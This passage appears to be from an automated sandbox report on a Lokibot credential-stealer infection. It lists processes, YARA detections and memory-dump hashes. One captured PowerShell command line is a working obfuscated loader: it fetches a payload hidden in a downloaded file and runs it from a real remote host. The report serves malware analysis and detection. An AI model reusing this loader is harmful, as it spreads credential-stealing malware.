-windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                    Imagebase:0xe80000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:12:14:11
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:9
                                                                                                                    Start time:12:14:12
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
                                                                                                                    Imagebase:0xe80000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:11
                                                                                                                    Start time:12:14:29
                                                                                                                    Start date:15/11/2024
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                    Imagebase:0xc50000
                                                                                                                    File size:56'368 bytes
                                                                                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Has exited:false

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
                                                                                                                      • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
                                                                                                                      • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
                                                                                                                      • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000003.2046351371.00000000067A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_3_67a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction ID: 626fac3bec459d70edd4d9991d0a3b730ce3cf43d2d5ca61c27259a86371ab76
                                                                                                                      • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2191763922.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3030000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ec59a70bc0b1ea7eff2695ed3c22dd20bff5b932d8ab31649b2e237d7948c19b
                                                                                                                      • Instruction ID: 98bf774b21dd75e365ed914396dc0a6df329ff0863738d2ba2b56593070d6c97
                                                                                                                      • Opcode Fuzzy Hash: ec59a70bc0b1ea7eff2695ed3c22dd20bff5b932d8ab31649b2e237d7948c19b
                                                                                                                      • Instruction Fuzzy Hash: 12223774A012199FCB05CF99C884AAEFBF6FF49310F298559E805AB361C735ED91CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_7780000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP]q$tP]q
                                                                                                                      • API String ID: 0-145478062
                                                                                                                      • Opcode ID: 67f640373868eb7b87b001198f2c442859ed0b1b72ad71eec89ed111b513d134
                                                                                                                      • Instruction ID: c4b8ffd864096a786d14b2b1da34a307a92f95780d61ed6ce3085966991af8cc
                                                                                                                      • Opcode Fuzzy Hash: 67f640373868eb7b87b001198f2c442859ed0b1b72ad71eec89ed111b513d134
                                                                                                                      • Instruction Fuzzy Hash: FEF115B0B102099FCB14AF6CD441A6ABBE2FBC9750F65886DE9499B340DF31DC42C7A1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_7780000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP]q$tP]q
                                                                                                                      • API String ID: 0-145478062
                                                                                                                      • Opcode ID: ff275736e1d48af8eee21ed62df9b6a8fd43023b9d4c94c2ca4cbc6be3ae0585
                                                                                                                      • Instruction ID: 9e52d52c25f584c51eadd173ba2bb44436ab58ab2ac4fdbb703a724cd197bc3f
                                                                                                                      • Opcode Fuzzy Hash: ff275736e1d48af8eee21ed62df9b6a8fd43023b9d4c94c2ca4cbc6be3ae0585
                                                                                                                      • Instruction Fuzzy Hash: 655147B1714255AFCB106B68C810B2EBBE6EFC5710F25885AE588DF381CA71DC49C7B1
                                                                                                                      APIs
                                                                                                                      • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 030351C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2191763922.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3030000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownloadFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1407266417-0
                                                                                                                      • Opcode ID: ec9a8683dd5baf30214174393f37366021259afe2d26f385da3cdba51df16f45
                                                                                                                      • Instruction ID: 0f71348aac63e3e05f2d3f1fe7a3dc274260c8d54be48d9e6639772a4c021ec4
                                                                                                                      • Opcode Fuzzy Hash: ec9a8683dd5baf30214174393f37366021259afe2d26f385da3cdba51df16f45
                                                                                                                      • Instruction Fuzzy Hash: AE21F6B1D0125ADFCB00CF99D984ADEFBF4FB49310F14811AE918A7210D375AA54CFA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_7780000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP]q
                                                                                                                      • API String ID: 0-2175968468
                                                                                                                      • Opcode ID: 95fddb128fffcba4ac3b3cad88cd85c1443df89b0ccb62654181a9ced3a07449
                                                                                                                      • Instruction ID: ba68c8ba53b3d808e1aec23a9da19125a9eaa0a6f151f81c8d10838be82154fc
                                                                                                                      • Opcode Fuzzy Hash: 95fddb128fffcba4ac3b3cad88cd85c1443df89b0ccb62654181a9ced3a07449
                                                                                                                      • Instruction Fuzzy Hash: 3391AFB0B502099FCB14EF48D540B6ABBF2FB84750F598959E9099B340DB31DC82CB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2191414701.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_e2d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 732ec689f9b6636ffcf2f48a8d2effa40962e8b00ccc6299e0862603eeb21759
                                                                                                                      • Instruction ID: b9382883f3dff4a322d879feef6ebd9bfd4f247fc720d0e3e8bcb047073f8e54
                                                                                                                      • Opcode Fuzzy Hash: 732ec689f9b6636ffcf2f48a8d2effa40962e8b00ccc6299e0862603eeb21759
                                                                                                                      • Instruction Fuzzy Hash: A9018C6200E3C05ED7128B259C94A52BFB4DF53228F0DC0DBD9888F1A3C2695C49C772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2191414701.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_e2d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 19425c8d3f38e13693c5efa466d4ec6377c3a22f462319b623bdaab6f4b2f872
                                                                                                                      • Instruction ID: 879531ee58d55ce7dde7dc57edb4a07127296c8ba3dbbb150d042d7764327d7a
                                                                                                                      • Opcode Fuzzy Hash: 19425c8d3f38e13693c5efa466d4ec6377c3a22f462319b623bdaab6f4b2f872
                                                                                                                      • Instruction Fuzzy Hash: B401F2714083149AE7108A29EDC4F67BFA8DF41328F28C41AEE486A296C2789C45C6B2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_7780000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                      • API String ID: 0-978391646
                                                                                                                      • Opcode ID: 95b3f77ca8f52626c05c75d9df736a9c64c143d37ac9cf49bcaa15c6f1a6b245
                                                                                                                      • Instruction ID: d0bd8ac38444504e30f3bc54b34ef8cdb221afe868951e646cb482f8d92abcd2
                                                                                                                      • Opcode Fuzzy Hash: 95b3f77ca8f52626c05c75d9df736a9c64c143d37ac9cf49bcaa15c6f1a6b245
                                                                                                                      • Instruction Fuzzy Hash: 7B514AB174530ACFCB65AF28C4107AABBE2AFC2350F25886AD445CB351DB31D859C7A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.2205628846.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_7780000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                      • API String ID: 0-978391646
                                                                                                                      • Opcode ID: 1584b176a2c470bf5b42b0340a2c97493070f7dbc1f1b200977f7d3e07c47bd7
                                                                                                                      • Instruction ID: 3678d518324cf31ed36eb7922786e78217f889fdb5071ae6525527ca544a35c4
                                                                                                                      • Opcode Fuzzy Hash: 1584b176a2c470bf5b42b0340a2c97493070f7dbc1f1b200977f7d3e07c47bd7
                                                                                                                      • Instruction Fuzzy Hash: 0A01266170C3854FC72A22295C302296FF2AFC2560B2A49EBC0D0DF297CA244C49C393
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_4770000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7ef816e938804a3c5ebb40d94c2e906c0a6db7e98bd917e5bde4a15c4bdd920e
                                                                                                                      • Instruction ID: 7dc1266d197d4d1e1d2687895805c174fa7d60c800a4ab074c6224d20b01cac3
                                                                                                                      • Opcode Fuzzy Hash: 7ef816e938804a3c5ebb40d94c2e906c0a6db7e98bd917e5bde4a15c4bdd920e
                                                                                                                      • Instruction Fuzzy Hash: D3918B74A002058FCB15CF59C4949AEFBF1FF48310B2585AAD865AB3A6C735FC51CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d86be138a3c948d87a2c68cb144ecb3c520fb688551bb3b24261d9c96c7770f6
                                                                                                                      • Instruction ID: c99c4df991e11a1ff604d680c7d5649d841797cd68081bb70762981c1e06aa4c
                                                                                                                      • Opcode Fuzzy Hash: d86be138a3c948d87a2c68cb144ecb3c520fb688551bb3b24261d9c96c7770f6
                                                                                                                      • Instruction Fuzzy Hash: 4E514BF0B2035AAFCB159B28851167ABBF69FD5720F1580A6C501EF285DB31CDA1C7A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b65760c14699f3076fd56a62b83ef9a964809dbb3eecc177d0096b14a2648305
                                                                                                                      • Instruction ID: 53e9fbe75b1fff0bcb7ce8c578eb37340a525db259d7d2c20e3ba7a820390618
                                                                                                                      • Opcode Fuzzy Hash: b65760c14699f3076fd56a62b83ef9a964809dbb3eecc177d0096b14a2648305
                                                                                                                      • Instruction Fuzzy Hash: 0A4139F0A2035BEFCB158B248541A7A7BF6AF86730F0480A6C500EF295D731C9A1C7A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_4770000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05b0be79d8f371db0eec850b7168ec2170621beab55ca752197c53f154f1e29f
                                                                                                                      • Instruction ID: 31fa5f1b5be68d35831621c72954993bb61210071bdefc6d5adc9c66bc8af2e3
                                                                                                                      • Opcode Fuzzy Hash: 05b0be79d8f371db0eec850b7168ec2170621beab55ca752197c53f154f1e29f
                                                                                                                      • Instruction Fuzzy Hash: 5E41B67490A3959FCB02DF7CC8A059A7FF0AF4B300B0945CBD485DF2A3D625A949CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_4770000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 57c395a373366a1b22332874ca84cb29d05de3e98d38c2ef2d0b2bfb5d61b0cf
                                                                                                                      • Instruction ID: b743e403eccffa0e2972cb52b857bd4d7aa7b8443672a96ea2832ed2fb9a0de5
                                                                                                                      • Opcode Fuzzy Hash: 57c395a373366a1b22332874ca84cb29d05de3e98d38c2ef2d0b2bfb5d61b0cf
                                                                                                                      • Instruction Fuzzy Hash: 31415A74A002059FCB09CF59C4989AEFBB1FF48310B6585A9D825AB365C736FC51CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077765728.0000000004770000.00000040.00000800.00020000.00000000.sdmp, Offset: 04770000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_4770000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7c4064be7a4f2b36529c06eca38243aa13f8558f9203cd7ee9f100883193ba3e
                                                                                                                      • Instruction ID: 3292e4ce58d073da032126df304c6dd6b28a2bc823a52ac1ee717e9b689567b8
                                                                                                                      • Opcode Fuzzy Hash: 7c4064be7a4f2b36529c06eca38243aa13f8558f9203cd7ee9f100883193ba3e
                                                                                                                      • Instruction Fuzzy Hash: 3511D4B4A006099FCB04CF98D9809AEFBF1FF89310B158599E919AB352C731FD45CBA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077177103.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_e1d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5c7ef4c635815d419aac774b2dd2a760ab4b448a1091a72acf5d23e57244d8ae
                                                                                                                      • Instruction ID: 3b06ae6966c6de0d3803e8ba53e083f548f6c9424aeee2694182f823c2bd73b0
                                                                                                                      • Opcode Fuzzy Hash: 5c7ef4c635815d419aac774b2dd2a760ab4b448a1091a72acf5d23e57244d8ae
                                                                                                                      • Instruction Fuzzy Hash: C601697140E3C05ED7128B258C94A92BFB49F53228F0980DBD8888F1A3C2689889C772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2077177103.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_e1d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 588369ef3e0285b974b6be343908939995140adb6cca31a9431ea76b3c4b2a03
                                                                                                                      • Instruction ID: c1f443179fdb0a462158b1bd53a38cbc5f23dcd88433c97b106587d6c8e94d38
                                                                                                                      • Opcode Fuzzy Hash: 588369ef3e0285b974b6be343908939995140adb6cca31a9431ea76b3c4b2a03
                                                                                                                      • Instruction Fuzzy Hash: 9801F271408300AAE7108E29CCC4BE7BF98DF49364F28C41AED486A286C37898C6C6B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-108373575
                                                                                                                      • Opcode ID: 65222e5e2d97a83e68eaf4118fe8dd90f608c490684e9283bcaf8cfb6f44a991
                                                                                                                      • Instruction ID: 9004487900193f10382476c92b2d97d6dd7e7db598240e4451f5c8b5d286a4fe
                                                                                                                      • Opcode Fuzzy Hash: 65222e5e2d97a83e68eaf4118fe8dd90f608c490684e9283bcaf8cfb6f44a991
                                                                                                                      • Instruction Fuzzy Hash: 2CF115B1B2021AAFCB149B6C84116AABBF5AFD5730F14807BD545CF281DB31DDA1CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-108373575
                                                                                                                      • Opcode ID: 2114c777f3d81d3824ef18055744b41fa08ef13d51ac356bf1fff08804fd8d77
                                                                                                                      • Instruction ID: ced3c45d13bd487a2e63b9e1a81ca689981e108634b0d01949e280cb1b9d7812
                                                                                                                      • Opcode Fuzzy Hash: 2114c777f3d81d3824ef18055744b41fa08ef13d51ac356bf1fff08804fd8d77
                                                                                                                      • Instruction Fuzzy Hash: 9EA135B1724356AFCB344A79881067ABBE5EFC6B20F18807BD545CB291EA31CC91C7A1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2086295475.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_72a0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$4']q$4']q
                                                                                                                      • API String ID: 0-1785108022
                                                                                                                      • Opcode ID: ec693c5980ad0f56d93fc7f95b765c4b52285ba76bfe549c57b340b4571178d8
